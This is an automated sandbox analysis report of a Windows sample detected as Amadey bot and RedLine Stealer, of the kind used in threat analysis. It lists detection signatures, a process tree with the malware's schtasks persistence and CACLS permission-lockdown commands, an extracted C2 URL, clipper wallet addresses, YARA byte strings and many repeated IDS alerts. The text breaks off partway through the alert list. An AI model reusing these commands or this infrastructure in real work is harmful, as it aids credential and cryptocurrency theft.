Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800799
MD5:16755b75334b8655bc2357553a9fdab4
SHA1:5705cf96e5337cd165fce107d5d11c020a69fe4f
SHA256:e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 1216 cmdline: C:\Users\user\Desktop\file.exe MD5: 16755B75334B8655BC2357553A9FDAB4)
    • bfCg.exe (PID: 2564 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe MD5: DAE3685D13248C42313D46F76E2EC968)
      • afCf.exe (PID: 2360 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe MD5: 6E870598039CCE621C7BB265AC99BB3F)
      • nika.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 1744 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 1084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 2376 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4784 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 3888 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4788 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 676 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 1328 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 3712 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 788 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5164 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5168 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4760 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5100 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 3888 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1100 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5124 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1fdd0:$s5: delete[]
              • 0x1f288:$s6: constructor or from DllMain.
              0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1e9d0:$s5: delete[]
                  • 0x1de88:$s6: constructor or from DllMain.
                  Click to see the 20 entries
                  SourceRuleDescriptionAuthorStrings
                  12.0.mnolyk.exe.980000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    25.2.mnolyk.exe.980000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.2.afCf.exe.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.2.afCf.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                        • 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                        • 0x1fdd0:$s5: delete[]
                        • 0x1f288:$s6: constructor or from DllMain.
                        11.2.xriv.exe.1360000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 20 entries
                          No Sigma rule has matched
                          Timestamp:192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524
                          SID:2027700
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236
                          SID:2027700
                          Source Port:50186
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319
                          SID:2027700
                          Source Port:50318
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849
                          SID:2027700
                          Source Port:50088
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651
                          SID:2027700
                          Source Port:50284
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107
                          SID:2027700
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144
                          SID:2027700
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404
                          SID:2027700
                          Source Port:50030
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955
                          SID:2027700
                          Source Port:50382
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379
                          SID:2027700
                          Source Port:50480
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989
                          SID:2027700
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292
                          SID:2027700
                          Source Port:49956
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073
                          SID:2027700
                          Source Port:50416
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463
                          SID:2027700
                          Source Port:50125
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905
                          SID:2027700
                          Source Port:50379
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956
                          SID:2027700
                          Source Port:50477
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151
                          SID:2027700
                          Source Port:50027
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790
                          SID:2027700
                          Source Port:50223
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323
                          SID:2027700
                          Source Port:50321
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153
                          SID:2027700
                          Source Port:50256
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019
                          SID:2027700
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313
                          SID:2027700
                          Source Port:49951
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990
                          SID:2027700
                          Source Port:50002
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830
                          SID:2027700
                          Source Port:50411
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595
                          SID:2027700
                          Source Port:49928
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958
                          SID:2027700
                          Source Port:50120
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042
                          SID:2027700
                          Source Port:50161
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199
                          SID:2027700
                          Source Port:50374
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547
                          SID:2027700
                          Source Port:50469
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842
                          SID:2027700
                          Source Port:50215
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795
                          SID:2027700
                          Source Port:50452
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013
                          SID:2027700
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584
                          SID:2027700
                          Source Port:50019
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922
                          SID:2027700
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969
                          SID:2027700
                          Source Port:50055
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637
                          SID:2027700
                          Source Port:49886
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394
                          SID:2027700
                          Source Port:50091
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770
                          SID:2027700
                          Source Port:50346
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173
                          SID:2027700
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015
                          SID:2027700
                          Source Port:50096
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796
                          SID:2027700
                          Source Port:49964
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203
                          SID:2027700
                          Source Port:50251
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163
                          SID:2027700
                          Source Port:49923
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192
                          SID:2027700
                          Source Port:50292
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060
                          SID:2027700
                          Source Port:49881
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304
                          SID:2027700
                          Source Port:49878
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060
                          SID:2027700
                          Source Port:49976
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569
                          SID:2027700
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617
                          SID:2027700
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279
                          SID:2027700
                          Source Port:49915
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250
                          SID:2027700
                          Source Port:50050
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305
                          SID:2027700
                          Source Port:50133
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538
                          SID:2027700
                          Source Port:50387
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183
                          SID:2027700
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209
                          SID:2027700
                          Source Port:50341
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159
                          SID:2027700
                          Source Port:50326
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891
                          SID:2027700
                          Source Port:50424
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930
                          SID:2027700
                          Source Port:50243
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188
                          SID:2027700
                          Source Port:50105
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512
                          SID:2027700
                          Source Port:50071
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391
                          SID:2027700
                          Source Port:50007
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956
                          SID:2027700
                          Source Port:50359
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351
                          SID:2027700
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646
                          SID:2027700
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392
                          SID:2027700
                          Source Port:49997
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607
                          SID:2027700
                          Source Port:50178
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075
                          SID:2027700
                          Source Port:50362
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939
                          SID:2027700
                          Source Port:49992
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026
                          SID:2027700
                          Source Port:50068
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290
                          SID:2027700
                          Source Port:50460
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374
                          SID:2027700
                          Source Port:49989
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578
                          SID:2027700
                          Source Port:49735
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893
                          SID:2027700
                          Source Port:50354
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010
                          SID:2027700
                          Source Port:50022
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717
                          SID:2027700
                          Source Port:50063
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274
                          SID:2027700
                          Source Port:50276
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001
                          SID:2027700
                          Source Port:49948
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943
                          SID:2027700
                          Source Port:50141
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152
                          SID:2027700
                          Source Port:50395
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405
                          SID:2027700
                          Source Port:50100
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355
                          SID:2027700
                          Source Port:50313
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593
                          SID:2027700
                          Source Port:50271
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087
                          SID:2027700
                          Source Port:49984
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965
                          SID:2027700
                          Source Port:49943
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502
                          SID:2027700
                          Source Port:49730
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234
                          SID:2027700
                          Source Port:50289
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798
                          SID:2027700
                          Source Port:50035
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086
                          SID:2027700
                          Source Port:50248
                          Destination Port:80
                          Protocol:TCP
